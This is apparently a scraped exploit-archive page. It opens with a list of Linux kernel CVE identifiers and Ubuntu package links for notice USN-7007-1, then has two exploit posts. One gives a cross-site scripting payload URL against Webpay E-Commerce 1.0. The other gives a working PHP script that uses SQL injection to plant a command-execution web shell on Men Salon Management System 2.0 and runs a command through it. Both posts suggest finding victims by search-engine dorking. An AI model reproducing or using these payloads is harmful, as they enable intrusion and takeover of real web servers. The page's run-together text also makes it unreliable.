CVE-2024-38583, CVE-2024-38586, CVE-2024-38587, CVE-2024-38588,  CVE-2024-38589, CVE-2024-38590, CVE-2024-38591, CVE-2024-38596,  CVE-2024-38597, CVE-2024-38598, CVE-2024-38599, CVE-2024-38601,  CVE-2024-38605, CVE-2024-38607, CVE-2024-38610, CVE-2024-38612,  CVE-2024-38613, CVE-2024-38615, CVE-2024-38618, CVE-2024-38619,  CVE-2024-38621, CVE-2024-38623, CVE-2024-38624, CVE-2024-38627,  CVE-2024-38633, CVE-2024-38634, CVE-2024-38635, CVE-2024-38637,  CVE-2024-38659, CVE-2024-38661, CVE-2024-38662, CVE-2024-38780,  CVE-2024-39276, CVE-2024-39277, CVE-2024-39301, CVE-2024-39466,  CVE-2024-39467, CVE-2024-39468, CVE-2024-39469, CVE-2024-39471,  CVE-2024-39475, CVE-2024-39480, CVE-2024-39482, CVE-2024-39487,  CVE-2024-39488, CVE-2024-39489, CVE-2024-39490, CVE-2024-39493,  CVE-2024-39495, CVE-2024-39499, CVE-2024-39500, CVE-2024-39501,  CVE-2024-39502, CVE-2024-39503, CVE-2024-39505, CVE-2024-39506,  CVE-2024-39507, CVE-2024-39509, CVE-2024-40901, CVE-2024-40902,  CVE-2024-40904, CVE-2024-40905, CVE-2024-40908, CVE-2024-40911,  CVE-2024-40912, CVE-2024-40914, CVE-2024-40916, CVE-2024-40927,  CVE-2024-40929, CVE-2024-40931, CVE-2024-40932, CVE-2024-40934,  CVE-2024-40937, CVE-2024-40941, CVE-2024-40942, CVE-2024-40943,  CVE-2024-40945, CVE-2024-40954, CVE-2024-40956, CVE-2024-40957,  CVE-2024-40958, CVE-2024-40959, CVE-2024-40960, CVE-2024-40961,  CVE-2024-40963, CVE-2024-40967, CVE-2024-40968, CVE-2024-40970,  CVE-2024-40971, CVE-2024-40974, CVE-2024-40976, CVE-2024-40978,  CVE-2024-40980, CVE-2024-40981, CVE-2024-40983, CVE-2024-40984,  CVE-2024-40987, CVE-2024-40988, CVE-2024-40990, CVE-2024-40994,  CVE-2024-40995, CVE-2024-41000, CVE-2024-41002, CVE-2024-41004,  CVE-2024-41005, CVE-2024-41006, CVE-2024-41007, CVE-2024-41027,  CVE-2024-41034, CVE-2024-41035, CVE-2024-41040, CVE-2024-41041,  CVE-2024-41044, CVE-2024-41046, CVE-2024-41047, CVE-2024-41048,  CVE-2024-41049, CVE-2024-41055, CVE-2024-41087, CVE-2024-41089,  CVE-2024-41092, CVE-2024-41093, CVE-2024-41095, CVE-2024-41097,  CVE-2024-42068, CVE-2024-42070, CVE-2024-42076, CVE-2024-42077,  CVE-2024-42080, CVE-2024-42082, CVE-2024-42084, CVE-2024-42085,  CVE-2024-42086, CVE-2024-42087, CVE-2024-42089, CVE-2024-42090,  CVE-2024-42092, CVE-2024-42093, CVE-2024-42094, CVE-2024-42095,  CVE-2024-42096, CVE-2024-42097, CVE-2024-42098, CVE-2024-42101,  CVE-2024-42102, CVE-2024-42104, CVE-2024-42105, CVE-2024-42106,  CVE-2024-42109, CVE-2024-42115, CVE-2024-42119, CVE-2024-42120,  CVE-2024-42121, CVE-2024-42124, CVE-2024-42127, CVE-2024-42130,  CVE-2024-42131, CVE-2024-42137, CVE-2024-42140, CVE-2024-42145,  CVE-2024-42148, CVE-2024-42152, CVE-2024-42153, CVE-2024-42154,  CVE-2024-42157, CVE-2024-42161, CVE-2024-42223, CVE-2024-42224,  CVE-2024-42225, CVE-2024-42229, CVE-2024-42232, CVE-2024-42236,  CVE-2024-42240, CVE-2024-42244, CVE-2024-42247Package Information:  https://launchpad.net/ubuntu/+source/linux/5.15.0-121.131  https://launchpad.net/ubuntu/+source/linux-aws/5.15.0-1069.75  https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1068.76  https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1066.72  https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1052.59  https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1062.65  https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1064.70  https://launchpad.net/ubuntu/+source/linux-kvm/5.15.0-1066.71  https://launchpad.net/ubuntu/+source/linux-nvidia/5.15.0-1064.65  https://launchpad.net/ubuntu/+source/linux-oracle/5.15.0-1067.73  https://launchpad.net/ubuntu/+source/linux-raspi/5.15.0-1062.65  https://launchpad.net/ubuntu/+source/linux-aws-5.15/5.15.0-1069.75~20.04.1  https://launchpad.net/ubuntu/+source/linux-gcp-5.15/5.15.0-1068.76~20.04.1  https://launchpad.net/ubuntu/+source/linux-gkeop-5.15/5.15.0-1052.59~20.04.1  https://launchpad.net/ubuntu/+source/linux-hwe-5.15/5.15.0-121.131~20.04.1  https://launchpad.net/ubuntu/+source/linux-intel-iotg-5.15/5.15.0-1064.70~20.04.1

Ubuntu Security Notice USN-7007-1

Webpay E-Commerce version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Webpay E-Commerce v1.0 XSS Vulnerability                                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /index.php?product=r-series'%22()%26%25<acx><ScRiPt%20>prompt(936967)</ScRiPt>[+] https://www/127.0.0.1/demo/gajrajgraphics.com.np/home/index.php?product=r-series'%22()%26%25<acx><ScRiPt%20>prompt(936967)</ScRiPt>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Webpay E-Commerce 1.0 Cross Site Scripting

Men Salon Management System version 2.0 suffers from a php code injection vulnerability.

    =============================================================================================================================================| # Title     : Men Salon Management System 2.0 php code injection Vulnerability                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/men-salon-management-system-using-php-and-mysql/                                                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject php code contains a back door.[+] Line 16 + 19 Set your Target.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php[+] payload :<?php// المكتبات المطلوبةfunction send_request($url, $data) {    $options = [        'http' => [            'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",            'method'  => 'POST',            'content' => http_build_query($data),        ]    ];    $context  = stream_context_create($options);    return file_get_contents($url, false, $context);}// تحديد URL ثابت$url = 'http://localhost/msms/';// مسار ثابت لرفع الملف$path = 'C:\www\msms\uploaded.php';$path = str_replace("\\", "\\\\", $path);// حمولة الباب الخلفي$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';// إرسال ملف PHP يحتوي على الباب الخلفي$payload = [    'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",    'password' => 'test',    'login' => ''];send_request($url . "admin/index.php", $payload);echo "[+] PHP backdoor uploaded successfully at $path\n";// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي$response = file_get_contents($url . "uploaded.php?cmd=whoami");echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#google